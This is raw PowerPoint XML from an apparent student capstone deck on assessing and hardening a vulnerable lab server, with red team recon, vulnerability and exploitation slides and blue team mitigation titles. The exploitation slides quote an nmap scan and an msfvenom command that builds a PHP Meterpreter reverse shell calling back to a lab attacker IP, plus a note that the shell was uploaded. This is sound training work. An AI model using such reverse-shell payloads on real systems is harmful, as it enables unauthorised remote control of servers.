          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to block file uploads?</a:t>
            </a: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Describe the solution. If possible, provide the required command line. </a:t>
            </a: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p56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Network Topology </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p56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3</a:t>
            </a:fld>
            <a:endParaRPr sz="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Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="11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Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Range: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 smtClean="0"/>
              <a:t>192.168.1.0/24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Netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 255.255.255.0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Gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>: 10.0.0.1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dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Blac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 smtClean="0"/>
              <a:t>IPv4: 192.168.1.90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OS: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 smtClean="0"/>
              <a:t>Hostname: Kali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 smtClean="0"/>
              <a:t>IPv4: 192.168.1.100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OS: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 smtClean="0"/>
              <a:t>Hostname: Elk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 smtClean="0"/>
              <a:t>IPv4: 192.168.1.105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OS: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 smtClean="0"/>
              <a:t>Hostname: Capstone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59" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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 Topology</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p57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 smtClean="0"/>
              <a:t>Volodymyr Dudar</a:t>
            </a:r>
            <a:endParaRPr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503" y="676592"/>
            <a:ext cx="6758082" cy="405691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5" name="Google Shape;1065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066" name="Google Shape;1066;p58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5</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="10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/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1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Security Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="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068" name="Google Shape;1068;p5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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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Google Shape;1073;p5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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p5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Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr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075" name="Google Shape;1075;p5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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="623552523"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{8B656EAD-8703-4AB1-84B0-60A72AC46955}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
              </a:tblGrid>
              <a:tr h="4032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Hostname</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="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IP Address</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="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Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="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00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="793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200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Kali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200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192.168.90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200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System running Kali OS used for penetration testing of the environment.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793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200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Elk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200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192.168.1.100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200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Server running Kibana to collect metrics during pen-testing exercise. Receives data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1200" baseline="0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from server 1.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793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200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Server1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200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192.168.1.105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200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Capstone server being the target of the exercise.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793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200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Jump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1200" baseline="0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Box, Hyper-V Azure Machine ML-RefVm-684427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200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192.168.1.1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200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Hyper-V Host machine running the simulation version of Capstone network.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6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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="810890702"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3669500"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{8B656EAD-8703-4AB1-84B0-60A72AC46955}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="3974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Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="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Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="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Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="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00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="767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i="1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Port 80 opens</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" baseline="0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with public access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1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i="1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Opens and unsecured access to anyone</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="1" baseline="0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attempting entry using Port 80.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" i="1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i="1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Files</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" i="1" baseline="0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and Folders are readily accesible. Sensitive files and folders can be found.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" i="1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767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Root accessibility.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Authorization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" baseline="0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to execute, command and access any resources on the vulnerable device.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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Vulnerabilities can be leveraged. Etensive potential</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1000" baseline="0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impact to any connected network.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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767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200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Simplistic usernames.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000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First</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1000" baseline="0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names, short names, or similar information can be easily socially engineered.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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000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Hannah, Ryan, and Ashton</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1000" baseline="0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are all predictable names that can be discovered by social engineering. In conjunction with a simple/weak password, files/folder can be attained.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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767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200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Weak passwords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000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Commonly used passwords suck as simple words, and the lack of password complexity,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1000" baseline="0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such as inclusion of symbols, numbers and capitals.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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000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System access could be discovered</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA" sz="1000" baseline="0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by social engineering. Leopoldo could be easily cracked within less than a minute.</a:t>
                      </a:r>
                      <a:endParaRPr sz="10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p6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Exploitation: [Name of First Vulnerability]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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91" name="Google Shape;1091;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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92" name="Google Shape;1092;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="31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 dirty="0"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sz="1200" b="1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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? Which tool (Nmap, etc.) or techniques (XSS, etc.) did you use?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CA" sz="1200" dirty="0" smtClean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CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap –sV 192.168.1.0/24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093" name="Google Shape;1093;p61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094" name="Google Shape;1094;p6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 dirty="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095" name="Google Shape;1095;p6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096" name="Google Shape;1096;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097;p6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 dirty="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098" name="Google Shape;1098;p6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099" name="Google Shape;1099;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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00" name="Google Shape;1100;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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 dirty="0"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sz="1200" b="1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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What did the exploit achieve? For example: Did it grant you a user shell, root access, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.?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" sz="12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 smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>80/tcp open http Apache httpd 2.4.29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01" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;p6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 dirty="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03" name="Google Shape;1103;p6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104" name="Google Shape;1104;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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05" name="Google Shape;1105;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="32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[INSERT: screenshot or command output illustrating the exploit.]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1272" y="2361695"/>
            <a:ext cx="2098231" cy="2216361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p6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Exploitation: [Name of Second Vulnerability]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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12" name="Google Shape;1112;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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13" name="Google Shape;1113;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="31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sz="1200" b="1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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? Which tool (Nmap, etc.) or techniques (XSS, etc.) did you use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>?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" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0"/>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=3280 &gt; shell.php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14" name="Google Shape;1114;p62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115" name="Google Shape;1115;p6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 dirty="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16" name="Google Shape;1116;p62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117" name="Google Shape;1117;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118" name="Google Shape;1118;p6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 dirty="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19" name="Google Shape;1119;p62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120" name="Google Shape;1120;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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21" name="Google Shape;1121;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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sz="1200" b="1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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What did the exploit achieve? For example: Did it grant you a user shell, root access, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.?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" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Uploaded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a PHP reverse shell payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 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22" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1123" name="Google Shape;1123;p6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 dirty="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24" name="Google Shape;1124;p62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125" name="Google Shape;1125;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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26" name="Google Shape;1126;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="32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[INSERT: screenshot or command output illustrating the exploit.]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1272" y="2355639"/>
            <a:ext cx="2241403" cy="31208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1272" y="2725031"/>
            <a:ext cx="2241403" cy="177259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561</TotalTime>
  <Words>1241</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>229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Arial</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: [Name of First Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [Name of Second Vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [Name of Third Vulnerability]</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads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Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <cp:lastModifiedBy>Vovik</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-24T03:29:31Z</dcterms:modified>
</cp:coreProperties>
</file>